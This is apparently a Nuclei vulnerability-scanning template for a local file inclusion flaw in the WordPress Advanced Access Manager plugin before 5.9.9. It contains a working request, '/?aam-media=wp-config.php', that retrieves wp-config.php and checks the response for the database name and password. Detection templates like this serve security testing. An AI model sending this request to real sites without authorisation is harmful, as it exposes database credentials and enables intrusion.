id: advanced-access-manager-lfi info: name: WordPress Advanced Access Manager < 5.9.9 - Local File Inclusion author: 0x_Akoko severity: high description: | WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers. reference: - https://wpscan.com/vulnerability/9873 - https://id.wordpress.org/plugins/advanced-access-manager/ - https://wpscan.com/vulnerability/dfe62ff5-956c-4403-b3fd-55677628036b classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 tags: wordpress,wp-plugin,lfi,wp,accessmanager,wpscan http: - method: GET path: - '{{BaseURL}}/?aam-media=wp-config.php' matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and - type: status status: - 200 # digest: 4b0a004830460221009191dd8b817c119a77f90d455552870e6a8e9be4a067ed8c18c4b87215ab7649022100a73a779b217af3c88c1a67b3c2230cd3e4733d7f33f0b126dc567fd55772e846:922c64590222798bb761d5b6d8e72950